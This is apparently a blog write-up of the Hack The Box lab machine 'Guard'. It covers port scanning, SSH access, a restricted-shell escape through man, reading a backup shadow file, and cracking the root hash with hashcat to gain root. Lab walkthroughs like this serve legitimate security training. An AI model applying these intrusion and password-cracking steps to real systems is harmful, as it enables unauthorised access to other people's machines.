Pages

Search

HTB Starting Point – Guard

$./portScan.sh

[+] 10.10.10.50 scan started...
[-] Open ports : 22 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 22:07 CEST
Nmap scan report for 10.10.10.50
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
|   256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_  256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
[+] 10.10.10.50 scan finished...

Ssh port is open.

Let’s try the last ssh user we obtained. 

 $ssh -i id_rsa daniel@10.10.10.50

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Mon Jun  1 20:22:44 UTC 2020

  System load:  0.0                Processes:             100
  Usage of /:   25.0% of 15.68GB   Users logged in:       0
  Memory usage: 11%                IP address for ens160: 10.10.10.50
  Swap usage:   0%

* Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

66 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun  1 16:57:35 2020 from 10.10.14.12
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

daniel@guard:~$

The SSH login gives us access to a restricted shell, where the commands like find, cat and python are disabled. 

We are unable to read user.txt from this shell. 
Man command can be used to spawn a bash shell.

Once the command opens the manual, we can enter the following command to spawn a bash shell.

daniel@guard:~$ man man

daniel@guard:~$ ls

user.txt

daniel@guard:~$ pwd

/home/picasso

daniel@guard:/home$ cd daniel

bash: cd: daniel: No such file or directory

daniel@guard:/home$ ls

user.txt

daniel@guard:~$ cat user.txt

2093XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

daniel@guard:/var$ ls

backups  cache crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp

daniel@guard:/var$ ls -la

total 52
drwxr-xr-x 13 root root   4096 Aug  5  2019 .
drwxr-xr-x 24 root root   4096 Mar  5 09:48 ..
drwxr-xr-x  2 root root   4096 Jun  1 06:25 backups
drwxr-xr-x 10 root root   4096 Mar  5 13:03 cache
drwxrwxrwt  2 root root   4096 Aug  5  2019 crash
drwxr-xr-x 36 root root   4096 Mar  5 10:02 lib
drwxrwsr-x  2 root staff  4096 Apr 24  2018 local
lrwxrwxrwx  1 root root      9 Aug  5  2019 lock -> /run/lock
drwxrwxr-x  9 root syslog 4096 Jun  1 06:25 log
drwxrwsr-x  2 root mail   4096 Aug  5  2019 mail
drwxr-xr-x  2 root root   4096 Aug  5  2019 opt
lrwxrwxrwx  1 root root      4 Aug  5  2019 run -> /run
drwxr-xr-x  3 root root   4096 Mar  5 10:02 snap
drwxr-xr-x  4 root root   4096 Aug  5  2019 spool
drwxrwxrwt  4 root root   4096 Jun  1 04:35 tmp

There is a backup directory  (/var/backups) and inside we find a shadow backup. 
Let’s try to crack the root hash with hashcat.

daniel@guard:/var/backups$ cat shadow

root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::

$ cat $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7::: > hash.txt
$hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 1024/2955 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
Dictionary cache hit:
* Filename..: ../../ctf-tools/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => q

Session..........: hashcat                       
Status...........: Quit
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv...82hY31
Time.Started.....: Mon Jun  1 23:15:00 2020 (32 secs)
Time.Estimated...: Tue Jun  2 05:10:43 2020 (5 hours, 55 mins)
Guess.Base.......: File (../../ctf-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      672 H/s (9.10ms) @ Accel:256 Loops:64 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20992/14344385 (0.15%)
Rejected.........: 0/20992 (0.00%)
Restore.Point....: 20992/14344385 (0.15%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4736-4800
Candidates.#1....: sayangkamu -> 230990

Started: Mon Jun  1 23:14:56 2020
Stopped: Mon Jun  1 23:15:33 2020

Copy the root hash into a text file and use the following command to crack it.

$ hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt

After it succeeds, use the following command to show the cracked password.

$ hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt --show

$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1

This reveals the root password to be password#1, which can be used to su to root.

$ssh root@10.10.10.50

root@10.10.10.50's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Mon Jun  1 21:38:36 UTC 2020

  System load:  0.0                Processes:             109
  Usage of /:   25.0% of 15.68GB   Users logged in:       1
  Memory usage: 11%                IP address for ens160: 10.10.10.50
  Swap usage:   0%

* Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

66 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun  1 18:37:34 2020 from 10.10.14.2
root@guard:~#

root@guard:~# cat root.txt

386cXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *